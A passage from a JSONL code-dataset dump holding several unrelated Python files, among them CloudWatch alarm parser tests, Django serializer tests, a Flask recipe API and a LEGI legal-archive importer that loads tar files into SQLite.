list(set(re.split(r',|-|\\.', api)))\n\n # print(api)\n\n if 'android' in api:\n api.remove('android')\n api = ','.join(api)\n\n text = re.findall(r'
<p>.+?</p>', elem.attrib['Body'], re.DOTALL)\n            text = ' '.join(list(map(lambda x: re.sub(\n                r'<.+?>|http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', x), text)))\n\n            # print(text)\n\n            # methods = re.findall(r'\\w+\\(\\)', text)\n            # methods = ','.join(list(set(map(lambda x: re.sub(r'\\(\\)', '', x), methods))))\n\n            code = re.findall(r'
<code>(.+?)</code>', elem.attrib['Body'], re.DOTALL)\n            code = ' '.join(list(map(lambda x: re.sub(r'\\s+', ' ', x), code)))\n\n            record = [elem.attrib['Id'], int(elem.attrib['PostTypeId']), -1, int(elem.attrib['Score']), text, code]\n            # parsed_data.append(record)\n            wr.writerow(record)\n            print(i)\n            i = i + 1\n        elem.clear()\n\n        # elif elem.attrib['PostTypeId'] == '2':\n        #     # print('=====')\n        #     # print(elem.attrib)\n        #\n        #     text = re.findall(r'
<p>.+?</p>', elem.attrib['Body'], re.DOTALL)\n        #     text = ' '.join(list(map(lambda x: re.sub(\n        #         r'<.+?>|http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', '', x), text)))\n        #     code = re.findall(r'<code>(.+?)</code>
', elem.attrib['Body'], re.DOTALL)\n # code = ' '.join(list(map(lambda x: re.sub(r'\\s+', ' ', x), code)))\n #\n # record = [elem.attrib['Id'], int(elem.attrib['PostTypeId']), elem.attrib['ParentId'], int(elem.attrib['Score']), text, code]\n # # parsed_data.append(record)\n # wr.writerow(record)\n\n\n\nparsed_data_file.close()\n\n","sub_path":"knowledge_retrieval_code/stackoverflow_parser.py","file_name":"stackoverflow_parser.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"208009483","text":"# -*- encoding: utf-8\n\nimport datetime as dt\n\nimport pytest\n\nfrom cloudwatch_alarms import build_cloudwatch_url, ThresholdMessage\n\n\nclass TestThresholdMessage:\n @pytest.mark.parametrize(\n \"message, actual_value\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n 1,\n ),\n (\n \"Threshold Crossed: 1 datapoint [12.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n 12,\n ),\n ],\n )\n def test_actual_value(self, message, actual_value):\n t = ThresholdMessage.from_message(message)\n assert t.actual_value == actual_value\n\n @pytest.mark.parametrize(\n \"message, desired_value\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n 1,\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (12.0).\",\n 12,\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (0.0).\",\n 0,\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (06/04/18 13:26:00)] was less than the threshold (1.5).\",\n 1.5,\n ),\n ],\n )\n def test_desired_value(self, message, desired_value):\n t = ThresholdMessage.from_message(message)\n assert t.desired_value == desired_value\n\n @pytest.mark.parametrize(\n \"message, expected_date\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n dt.datetime(2018, 2, 5, 6, 28, 0),\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (11/08/18 10:55:00)] was greater than the threshold (1.0).\",\n dt.datetime(2018, 8, 11, 10, 55, 0),\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (09/01/18 10:36:31)] was greater than the threshold (1.0).\",\n dt.datetime(2018, 1, 9, 10, 36, 31),\n ),\n ],\n )\n def test_date(self, message, expected_date):\n t = ThresholdMessage.from_message(message)\n assert t.date == expected_date\n\n @pytest.mark.parametrize(\n \"message, expected_operator\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n \"greater than\",\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than or equal to the threshold (1.0).\",\n \"greater than or equal to\",\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was less than the threshold (1.0).\",\n \"less than\",\n ),\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was less than or equal to the threshold (1.0).\",\n \"less than or equal to\",\n ),\n ],\n )\n def test_operator(self, message, expected_operator):\n t = ThresholdMessage.from_message(message)\n assert t.operator == expected_operator\n\n @pytest.mark.parametrize(\"bad_message\", [\"foo\", \"not a real message\"])\n def test_unexpected_message_is_valueerror(self, bad_message):\n with pytest.raises(ValueError):\n ThresholdMessage.from_message(bad_message)\n\n 
@pytest.mark.parametrize(\n \"message, is_breaching\",\n [\n (\n \"Threshold Crossed: 1 datapoint [1.0 (05/02/18 06:28:00)] was greater than the threshold (1.0).\",\n False,\n ),\n (\n \"Threshold Crossed: no datapoints were received for 1 period and 1 missing datapoint was treated as [Breaching].\",\n True,\n ),\n ],\n )\n def test_is_breaching(self, message, is_breaching):\n t = ThresholdMessage.from_message(message)\n assert t.is_breaching == is_breaching\n\n\ndef test_build_cloudwatch_url():\n url = build_cloudwatch_url(\n search_term=\"HTTP500\",\n log_group_name=\"platform/loris\",\n start_date=dt.datetime(2018, 3, 5, 6, 28, 0),\n end_date=dt.datetime(2018, 3, 5, 6, 34, 0),\n region=\"us-east-1\",\n )\n assert url == (\n \"https://us-east-1.console.aws.amazon.com/cloudwatch/home\"\n \"?region=us-east-1#logEventViewer:group=platform/loris;\"\n \"filter=HTTP500;start=2018-03-05T06:28:00Z;end=2018-03-05T06:34:00Z;\"\n )\n","sub_path":"monitoring/post_to_slack/src/test_cloudwatch_alarms.py","file_name":"test_cloudwatch_alarms.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"19780002","text":"from django.test import SimpleTestCase\n\nfrom ..serializers import ExcListUMIDSerializer, ExcListKeySerializer\n\n\nclass UMIDSerializerTests(SimpleTestCase):\n\n # Test validation\n def test_valid_data(self):\n umid = '00123400' # leading and trailing zeroes\n serializer = ExcListUMIDSerializer(data={\n 'umid': umid,\n })\n self.assertTrue(serializer.is_valid())\n self.assertEqual(serializer.validated_data['umid'], umid)\n\n # Test for all required fields\n def test_blank_data(self):\n serializer = ExcListUMIDSerializer(data={})\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors['umid'], ['This field is required.'])\n\n # Test for invalid data\n def test_invalid_data(self):\n serializer = ExcListUMIDSerializer(data={\n 'umid': 'abc123',\n })\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors['umid'], ['Enter a valid UMID.'])\n\n\nclass KeySerializerTests(SimpleTestCase):\n\n # Test validation\n def test_valid_data(self):\n key = '00-this-is-my-key-00' # leading and trailing zeroes\n serializer = ExcListKeySerializer(data={\n 'key': key,\n })\n self.assertTrue(serializer.is_valid())\n self.assertEqual(serializer.validated_data['key'], key)\n\n # Test for all required fields\n def test_blank_data(self):\n serializer = ExcListKeySerializer(data={})\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors['key'], ['This field is required.'])\n\n","sub_path":"api/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"304167217","text":"# To build an API endpoint, we need to define a class \n# that inherits from flask_restful.Resource\n\nfrom flask import request\nfrom flask_restful import Resource\nfrom http import HTTPStatus\nfrom models.recipe import Recipe, recipe_list\n\n# We need to create three resources: RecipeListResource,\n# RecipeResource, and RecipePublishResource\n\nclass RecipeListResource(Resource):\n # Add the get metho\n def get(self):\n data = []\n for recipe in recipe_list:\n if recipe.is_publish is True:\n data.append(recipe.data)\n return {'data': data}, HTTPStatus.OK\n\n# Add the post method\n def post(self):\n data = request.get_json()\n recipe = 
Recipe(name=data['name'],\n description=data['description'],\n num_of_servings=data['num_of_servings'],\n cook_time=data['cook_time'],\n directions=data['directions'])\n recipe_list.append(recipe)\n return recipe.data, HTTPStatus.CREATED\n\n# define the recipe resource\nclass RecipeResource(Resource):\n def get(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe.id and \n recipe.is_publish == True), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n return recipe.data, HTTPStatus.OK\n\n # Implement the put method\n def put(self, recipe_id):\n data = request.get_json()\n recipe = recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n recipe.name = data['name']\n recipe.description = data['description']\n recipe.num_of_servings = data['num_of_servings']\n recipe.cook_time = data['cook_time']\n recipe.directions = data['directions']\n return recipe.data, HTTPStatus.OK\n\n # delete recipe\n def delete(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n #recipe.is_publish = False\n recipe_list.remove(recipe)\n return {}, HTTPStatus.NO_CONTENT\n \n\n# Define the RecipePublic resource and implement the put method \n# RecipePublishResource inherits from flask_restful.Resource\nclass RecipePublishResource(Resource):\n# finds the recipe with the passed-in recipe_id and update the is_publish status to true.\n def put(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n # shows that the recipe has been published successfully.\n recipe.is_publish = True\n return{}, HTTPStatus.NO_CONTENT\n\n # Implement the delete method\n def delete(self, recipe_id):\n recipe = next((recipe for recipe in recipe_list if recipe.id == recipe_id), None)\n if recipe is None:\n return {'message': 'recipe not found'}, HTTPStatus.NOT_FOUND\n recipe.is_publish = False\n return {}, HTTPStatus.NO_CONTENT\n\n\n\n","sub_path":"Smilecook/resources/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":3318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"477303409","text":"\"\"\"\nExtracts LEGI tar archives into an SQLite DB\n\"\"\"\n\nfrom argparse import ArgumentParser\nfrom collections import defaultdict\nfrom fnmatch import fnmatch\nimport json\nimport os\nimport re\n\nimport libarchive\nfrom lxml import etree\n\ntry:\n from tqdm import tqdm\nexcept ImportError:\n print('[warning] tqdm is not installed, the progress bar is disabled')\n tqdm = lambda x: x\n\nfrom .anomalies import detect_anomalies\nfrom .db import connect_db\nfrom .html import CleaningError, clean_html, remove_detected_soft_hyphens\nfrom .utils import partition\n\n\nSOUS_DOSSIER_MAP = {\n 'articles': 'article',\n 'sections': 'section_ta',\n 'textes_structs': 'texte/struct',\n 'textes_versions': 'texte/version',\n}\n\n\ndef innerHTML(e):\n r = etree.tostring(e, encoding='unicode', with_tail=False)\n return r[r.find('>')+1:-len(e.tag)-3]\n\n\ndef suppress(get_table, db, liste_suppression):\n counts = defaultdict(int)\n for path in liste_suppression:\n parts = path.split('/')\n assert parts[0] == 'legi'\n row_cid = parts[11]\n row_id = 
parts[-1]\n assert len(row_id) == 20\n table = get_table(parts)\n sous_dossier = SOUS_DOSSIER_MAP[table]\n db.run(\"\"\"\n DELETE FROM {0}\n WHERE dossier = ?\n AND cid = ?\n AND id = ?\n \"\"\".format(table), (parts[3], row_cid, row_id))\n changes = db.changes()\n if changes:\n counts['delete from ' + table] += changes\n # Also delete derivative data\n if table in ('articles', 'textes_versions'):\n db.run(\"\"\"\n DELETE FROM liens\n WHERE src_id = ? AND NOT _reversed\n OR dst_id = ? AND _reversed\n \"\"\", (row_id, row_id))\n counts['delete from liens'] += db.changes()\n elif table == 'sections':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND parent = ?\n AND _source = 'section_ta_liens'\n \"\"\", (row_cid, row_id))\n counts['delete from sommaires'] += db.changes()\n elif table == 'textes_structs':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND _source = 'struct/' || ?\n \"\"\", (row_cid, row_id))\n counts['delete from sommaires'] += db.changes()\n # And delete the associated row in textes_versions_brutes if it exists\n if table == 'textes_versions':\n db.run(\"DELETE FROM textes_versions_brutes WHERE id = ?\", (row_id,))\n counts['delete from textes_versions_brutes'] += db.changes()\n # If the file had an older duplicate that hasn't been deleted then\n # we have to fall back to that, otherwise we'd be missing data\n older_file = db.one(\"\"\"\n SELECT *\n FROM duplicate_files\n WHERE id = ?\n AND sous_dossier = ?\n ORDER BY mtime DESC\n LIMIT 1\n \"\"\", (row_id, sous_dossier), to_dict=True)\n if older_file:\n db.run(\"\"\"\n DELETE FROM duplicate_files\n WHERE dossier = ?\n AND cid = ?\n AND sous_dossier = ?\n AND id = ?\n \"\"\", (older_file['dossier'], older_file['cid'], sous_dossier, older_file['id']))\n counts['delete from duplicate_files'] += db.changes()\n for table, rows in json.loads(older_file['data']).items():\n if isinstance(rows, dict):\n rows['id'] = older_file['id']\n rows['cid'] = older_file['cid']\n rows['dossier'] = older_file['dossier']\n rows['mtime'] = older_file['mtime']\n rows = (rows,)\n for row in rows:\n db.insert(table, row)\n counts['insert into ' + table] += len(rows)\n else:\n # Remove the file from the duplicates table if it was in there\n db.run(\"\"\"\n DELETE FROM duplicate_files\n WHERE dossier = ?\n AND cid = ?\n AND sous_dossier = ?\n AND id = ?\n \"\"\", (parts[3], row_cid, sous_dossier, row_id))\n counts['delete from duplicate_files'] += db.changes()\n total = sum(counts.values())\n print(\"made\", total, \"changes in the database based on liste_suppression_legi.dat:\",\n json.dumps(counts, indent=4, sort_keys=True))\n\n\ndef process_archive(db, archive_path, raw, process_links=True, check_html=True):\n\n # Define some constants\n ARTICLE_TAGS = set('NOTA BLOC_TEXTUEL'.split())\n SECTION_TA_TAGS = set('TITRE_TA COMMENTAIRE'.split())\n TEXTELR_TAGS = set('VERSIONS'.split())\n TEXTE_VERSION_TAGS = set('VISAS SIGNATAIRES TP NOTA ABRO RECT'.split())\n META_ARTICLE_TAGS = set('NUM ETAT DATE_DEBUT DATE_FIN TYPE'.split())\n META_CHRONICLE_TAGS = set(\"\"\"\n NUM NUM_SEQUENCE NOR DATE_PUBLI DATE_TEXTE DERNIERE_MODIFICATION\n ORIGINE_PUBLI PAGE_DEB_PUBLI PAGE_FIN_PUBLI\n \"\"\".split())\n META_VERSION_TAGS = set(\n 'TITRE TITREFULL ETAT DATE_DEBUT DATE_FIN AUTORITE MINISTERE'.split()\n )\n TABLES_MAP = {'ARTI': 'articles', 'SCTA': 'sections', 'TEXT': 'textes_'}\n TYPELIEN_MAP = {\n \"ABROGATION\": \"ABROGE\",\n \"ANNULATION\": \"ANNULE\",\n \"CODIFICATION\": \"CODIFIE\",\n \"CONCORDANCE\": \"CONCORDE\",\n \"CREATION\": 
\"CREE\",\n \"DEPLACE\": \"DEPLACEMENT\",\n \"DISJOINT\": \"DISJONCTION\",\n \"MODIFICATION\": \"MODIFIE\",\n \"PEREMPTION\": \"PERIME\",\n \"RATIFICATION\": \"RATIFIE\",\n \"TRANSFERE\": \"TRANSFERT\",\n }\n TYPELIEN_MAP.update([(v, k) for k, v in TYPELIEN_MAP.items()])\n\n # Define some shortcuts\n attr = etree._Element.get\n insert = db.insert\n update = db.update\n\n def get_table(parts):\n table = TABLES_MAP[parts[-1][4:8]]\n if table == 'textes_':\n table += parts[13] + 's'\n return table\n\n soft_hyphens = defaultdict(list)\n def scrape_tags(attrs, root, wanted_tags, unwrap=False, clean=False):\n for e in root:\n if e.tag not in wanted_tags:\n continue\n col = e.tag.lower()\n html = innerHTML(e[0] if unwrap else e)\n if clean and not raw:\n try:\n html = clean_html(html, check=check_html)\n except CleaningError as e:\n print()\n print('=' * 70)\n print(f\"Cleaning column {col!r} of row {row_id!r} failed:\")\n print(str(e))\n print()\n attrs[col] = html or None\n if '\\u00AD' in html:\n soft_hyphens[row_cid].append((table, row_id, col, html))\n\n counts = defaultdict(int)\n skipped = 0\n unknown_folders = {}\n liste_suppression = []\n xml = etree.XMLParser(remove_blank_text=True)\n with tqdm(total=os.stat(archive_path).st_size, unit='bytes') as pbar, \\\n open(archive_path, 'rb') as file, \\\n libarchive.stream_reader(file) as archive:\n for entry in archive:\n path = entry.pathname\n if type(path) is bytes:\n path = path.decode('latin-1')\n if path[-1] == '/':\n continue\n parts = path.split('/')\n if parts[-1] == 'liste_suppression_legi.dat':\n liste_suppression += b''.join(entry.get_blocks()).decode('ascii').split()\n continue\n if parts[1] == 'legi':\n path = path[len(parts[0])+1:]\n parts = parts[1:]\n if not parts[2].startswith('code_et_TNC_'):\n # https://github.com/Legilibre/legi.py/issues/23\n try:\n unknown_folders[parts[2]] += 1\n except KeyError:\n unknown_folders[parts[2]] = 1\n continue\n dossier = parts[3]\n row_cid = parts[11]\n row_id = parts[-1][:-4]\n mtime = entry.mtime\n\n # Skip the file if it hasn't changed, store it if it's a duplicate\n duplicate = False\n table = get_table(parts)\n prev_row = db.one(\"\"\"\n SELECT mtime, dossier, cid\n FROM {0}\n WHERE id = ?\n \"\"\".format(table), (row_id,))\n if prev_row:\n prev_mtime, prev_dossier, prev_cid = prev_row\n if prev_dossier != dossier or prev_cid != row_cid:\n if prev_mtime >= mtime:\n duplicate = True\n else:\n prev_row_dict = db.one(\"\"\"\n SELECT *\n FROM {0}\n WHERE id = ?\n \"\"\".format(table), (row_id,), to_dict=True)\n data = {table: prev_row_dict}\n data['liens'] = db.list(\"\"\"\n SELECT *\n FROM liens\n WHERE src_id = ? AND NOT _reversed\n OR dst_id = ? 
AND _reversed\n \"\"\", (row_id, row_id), to_dict=True)\n if table == 'sections':\n data['sommaires'] = db.list(\"\"\"\n SELECT *\n FROM sommaires\n WHERE cid = ?\n AND parent = ?\n AND _source = 'section_ta_liens'\n \"\"\", (row_id, row_id), to_dict=True)\n elif table == 'textes_structs':\n source = 'struct/' + row_id\n data['sommaires'] = db.list(\"\"\"\n SELECT *\n FROM sommaires\n WHERE cid = ?\n AND _source = ?\n \"\"\", (row_cid, source), to_dict=True)\n data = {k: v for k, v in data.items() if v}\n insert('duplicate_files', {\n 'id': row_id,\n 'sous_dossier': SOUS_DOSSIER_MAP[table],\n 'cid': prev_cid,\n 'dossier': prev_dossier,\n 'mtime': prev_mtime,\n 'data': json.dumps(data),\n 'other_cid': row_cid,\n 'other_dossier': dossier,\n 'other_mtime': mtime,\n }, replace=True)\n counts['upsert into duplicate_files'] += 1\n elif prev_mtime == mtime:\n skipped += 1\n continue\n\n xml.feed(b''.join(entry.get_blocks()))\n root = xml.close()\n tag = root.tag\n meta = root.find('META')\n\n # Check the ID\n if tag == 'SECTION_TA':\n assert root.find('ID').text == row_id\n else:\n meta_commun = meta.find('META_COMMUN')\n assert meta_commun.find('ID').text == row_id\n nature = meta_commun.find('NATURE').text\n\n # Extract the data we want\n attrs = {}\n liens = ()\n sommaires = ()\n if tag == 'ARTICLE':\n assert nature == 'Article'\n assert table == 'articles'\n contexte = root.find('CONTEXTE/TEXTE')\n assert attr(contexte, 'cid') == row_cid\n sections = contexte.findall('.//TITRE_TM')\n if sections:\n attrs['section'] = attr(sections[-1], 'id')\n meta_article = meta.find('META_SPEC/META_ARTICLE')\n scrape_tags(attrs, meta_article, META_ARTICLE_TAGS)\n scrape_tags(attrs, root, ARTICLE_TAGS, unwrap=True, clean=True)\n elif tag == 'SECTION_TA':\n assert table == 'sections'\n scrape_tags(attrs, root, SECTION_TA_TAGS)\n section_id = row_id\n contexte = root.find('CONTEXTE/TEXTE')\n assert attr(contexte, 'cid') == row_cid\n parents = contexte.findall('.//TITRE_TM')\n if parents:\n attrs['parent'] = attr(parents[-1], 'id')\n sommaires = [\n {\n 'cid': row_cid,\n 'parent': section_id,\n 'element': attr(lien, 'id'),\n 'debut': attr(lien, 'debut'),\n 'fin': attr(lien, 'fin'),\n 'etat': attr(lien, 'etat'),\n 'num': attr(lien, 'num'),\n 'position': i,\n '_source': 'section_ta_liens',\n }\n for i, lien in enumerate(root.find('STRUCTURE_TA'))\n ]\n elif tag == 'TEXTELR':\n assert table == 'textes_structs'\n scrape_tags(attrs, root, TEXTELR_TAGS)\n sommaires = [\n {\n 'cid': row_cid,\n 'element': attr(lien, 'id'),\n 'debut': attr(lien, 'debut'),\n 'fin': attr(lien, 'fin'),\n 'etat': attr(lien, 'etat'),\n 'position': i,\n '_source': 'struct/' + row_id,\n }\n for i, lien in enumerate(root.find('STRUCT'))\n ]\n elif tag == 'TEXTE_VERSION':\n assert table == 'textes_versions'\n attrs['nature'] = nature\n meta_spec = meta.find('META_SPEC')\n meta_chronicle = meta_spec.find('META_TEXTE_CHRONICLE')\n assert meta_chronicle.find('CID').text == row_cid\n scrape_tags(attrs, meta_chronicle, META_CHRONICLE_TAGS)\n meta_version = meta_spec.find('META_TEXTE_VERSION')\n scrape_tags(attrs, meta_version, META_VERSION_TAGS)\n scrape_tags(attrs, root, TEXTE_VERSION_TAGS, unwrap=True, clean=True)\n else:\n raise Exception('unexpected tag: '+tag)\n\n if process_links and tag in ('ARTICLE', 'TEXTE_VERSION'):\n e = root if tag == 'ARTICLE' else meta_version\n liens_tags = e.find('LIENS')\n if liens_tags is not None:\n liens = []\n for lien in liens_tags:\n typelien, sens = attr(lien, 'typelien'), attr(lien, 'sens')\n src_id, dst_id = 
row_id, attr(lien, 'id')\n if sens == 'cible':\n assert dst_id\n src_id, dst_id = dst_id, src_id\n dst_cid = dst_titre = ''\n typelien = TYPELIEN_MAP.get(typelien, typelien+'_R')\n _reversed = True\n else:\n dst_cid = attr(lien, 'cidtexte')\n dst_titre = lien.text\n _reversed = False\n liens.append({\n 'src_id': src_id,\n 'dst_cid': dst_cid,\n 'dst_id': dst_id,\n 'dst_titre': dst_titre,\n 'typelien': typelien,\n '_reversed': _reversed,\n })\n\n if duplicate:\n data = {table: attrs}\n if liens:\n data['liens'] = liens\n if sommaires:\n data['sommaires'] = sommaires\n insert('duplicate_files', {\n 'id': row_id,\n 'sous_dossier': SOUS_DOSSIER_MAP[table],\n 'cid': row_cid,\n 'dossier': dossier,\n 'mtime': mtime,\n 'data': json.dumps(data),\n 'other_cid': prev_cid,\n 'other_dossier': prev_dossier,\n 'other_mtime': prev_mtime,\n }, replace=True)\n counts['upsert into duplicate_files'] += 1\n continue\n\n attrs['dossier'] = dossier\n attrs['cid'] = row_cid\n attrs['mtime'] = mtime\n\n if prev_row:\n # Delete the associated rows\n if tag == 'SECTION_TA':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND parent = ?\n AND _source = 'section_ta_liens'\n \"\"\", (row_cid, section_id))\n counts['delete from sommaires'] += db.changes()\n elif tag == 'TEXTELR':\n db.run(\"\"\"\n DELETE FROM sommaires\n WHERE cid = ?\n AND _source = ?\n \"\"\", (row_cid, 'struct/' + row_id))\n counts['delete from sommaires'] += db.changes()\n if tag in ('ARTICLE', 'TEXTE_VERSION'):\n db.run(\"\"\"\n DELETE FROM liens\n WHERE src_id = ? AND NOT _reversed\n OR dst_id = ? AND _reversed\n \"\"\", (row_id, row_id))\n counts['delete from liens'] += db.changes()\n if table == 'textes_versions':\n db.run(\"DELETE FROM textes_versions_brutes WHERE id = ?\", (row_id,))\n counts['delete from textes_versions_brutes'] += db.changes()\n # Update the row\n counts['update in '+table] += 1\n update(table, dict(id=row_id), attrs)\n else:\n counts['insert into '+table] += 1\n attrs['id'] = row_id\n insert(table, attrs)\n\n # Insert the associated rows\n for lien in liens:\n db.insert('liens', lien)\n counts['insert into liens'] += len(liens)\n for sommaire in sommaires:\n db.insert('sommaires', sommaire)\n counts['insert into sommaires'] += len(sommaires)\n\n # Update the progress bar\n pbar.update(file.tell() - pbar.n)\n\n print(\"made\", sum(counts.values()), \"changes in the database:\",\n json.dumps(counts, indent=4, sort_keys=True))\n\n if skipped:\n print(\"skipped\", skipped, \"files that haven't changed\")\n\n if unknown_folders:\n for d, x in unknown_folders.items():\n print(\"skipped\", x, \"files in unknown folder `%s`\" % d)\n\n if liste_suppression:\n suppress(get_table, db, liste_suppression)\n\n if not raw:\n remove_detected_soft_hyphens(db, soft_hyphens)\n\n\ndef main():\n p = ArgumentParser()\n p.add_argument('db')\n p.add_argument('directory')\n p.add_argument('--anomalies', action='store_true', default=False,\n help=\"detect anomalies after each processed archive\")\n p.add_argument('--anomalies-dir', default='.')\n p.add_argument('--pragma', action='append', default=[],\n help=\"Doc: https://www.sqlite.org/pragma.html | Example: journal_mode=WAL\")\n p.add_argument('--raw', default=False, action='store_true')\n p.add_argument('--skip-checks', default=False, action='store_true',\n help=\"skip the HTML cleaning checks\")\n p.add_argument('--skip-links', default=False, action='store_true',\n help=\"ignore all link metadata (the `liens` table will be empty)\")\n args = p.parse_args()\n\n if not 
os.path.isdir(args.anomalies_dir):\n os.mkdir(args.anomalies_dir)\n\n db = connect_db(args.db, pragmas=args.pragma)\n last_update = db.one(\"SELECT value FROM db_meta WHERE key = 'last_update'\")\n\n # Check and record the data mode\n db_meta_raw = db.one(\"SELECT value FROM db_meta WHERE key = 'raw'\")\n if args.raw:\n versions_brutes = bool(db.one(\"SELECT 1 FROM textes_versions_brutes LIMIT 1\"))\n data_is_not_raw = versions_brutes or db_meta_raw is False\n if data_is_not_raw:\n print(\"!> Can't honor --raw option, the data has already been modified previously.\")\n raise SystemExit(1)\n if db_meta_raw != args.raw:\n db.insert('db_meta', dict(key='raw', value=args.raw), replace=True)\n\n # Handle the --skip-links option\n has_links = bool(db.one(\"SELECT 1 FROM liens LIMIT 1\"))\n if not args.skip_links and not has_links and last_update is not None:\n args.skip_links = True\n print(\"> Warning: links will not be processed because this DB was built with --skip-links.\")\n elif args.skip_links and has_links:\n print(\"> Deleting links...\")\n db.run(\"DELETE FROM liens\")\n\n # Look for new archives in the given directory\n print(\"> last_update is\", last_update)\n archive_re = re.compile(r'(.+_)?legi(?P_global)?_(?P[0-9]{8}-[0-9]{6})\\..+', flags=re.IGNORECASE)\n skipped = 0\n archives = sorted([\n (m.group('date'), bool(m.group('global')), m.group(0)) for m in [\n archive_re.match(fn) for fn in os.listdir(args.directory)\n if fnmatch(fn.lower(), '*legi_*.tar.*')\n ]\n ])\n most_recent_global = [t[0] for t in archives if t[1]][-1]\n if last_update and most_recent_global > last_update:\n print(\"> There is a new global archive, recreating the DB from scratch!\")\n db.close()\n os.rename(db.address, db.address + '.back')\n db = connect_db(args.db, pragmas=args.pragma)\n archives, skipped = partition(\n archives, lambda t: t[0] >= most_recent_global and t[0] > (last_update or '')\n )\n if skipped:\n print(\"> Skipped %i old archives\" % len(skipped))\n\n # Process the new archives\n process_links = not args.skip_links\n check_html = not args.skip_checks\n for archive_date, is_global, archive_name in archives:\n print(\"> Processing %s...\" % archive_name)\n with db:\n process_archive(\n db, args.directory + '/' + archive_name, args.raw,\n process_links=process_links, check_html=check_html,\n )\n if last_update:\n db.run(\"UPDATE db_meta SET value = ? 
WHERE key = 'last_update'\", (archive_date,))\n else:\n db.run(\"INSERT INTO db_meta VALUES ('last_update', ?)\", (archive_date,))\n last_update = archive_date\n print('last_update is now set to', last_update)\n\n # Detect anomalies if requested\n if args.anomalies:\n fpath = args.anomalies_dir + '/anomalies-' + last_update + '.txt'\n with open(fpath, 'w') as f:\n n_anomalies = detect_anomalies(db, f)\n print(\"logged\", n_anomalies, \"anomalies in\", fpath)\n\n if not args.raw:\n from .normalize import (\n normalize_article_numbers, normalize_section_titles,\n normalize_sommaires_num, normalize_text_titles,\n )\n normalize_text_titles(db)\n normalize_section_titles(db)\n normalize_article_numbers(db)\n normalize_sommaires_num(db)\n from .factorize import main as factorize\n factorize(db)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n pass\n","sub_path":"legi/tar2sqlite.py","file_name":"tar2sqlite.py","file_ext":"py","file_size_in_byte":23975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"253636904","text":"from time import time\n\nfrom django.core.cache import cache\nfrom django.utils.translation import get_language\n\n\n__all__ = (\n 'get_cache_key', 'get_cache_pattern', 'invalidate', 'invalidate_object',\n)\n\n\ndef get_cache_key(method, obj, args, kwargs, id_attr='pk'):\n _id = getattr(obj, id_attr)\n if _id is None:\n return\n meta = obj._meta\n return '%s:%s.%s.%s:%s(%s,%s)' % (\n get_language(), meta.app_label, meta.model_name,\n method.__name__, _id, args, kwargs)\n\n\ndef get_obj_cache_key(obj, id_attr='pk'):\n meta = obj._meta\n return '%s.%s.%s' % (\n meta.app_label, meta.model_name, getattr(obj, id_attr))\n\n\ndef invalidate_object(obj, id_attr='pk'):\n object_cache_key = get_obj_cache_key(obj, id_attr)\n cache.set(object_cache_key, time(), None)\n","sub_path":"cache_tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"306108727","text":"#!/usr/bin/env python \n# -*- coding:utf-8 -*-\nimport math\nimport sys\nimport re\nimport collections\nimport itertools\nfrom functools import *\n\n\ndef solve():\n # =list(map(int,input().split()))\n # =int(input())\n\n # n =input()[2:-2].split('],[')a\n # target=int(input())\n R=int(input())\n C=int(input())\n r0=int(input())\n 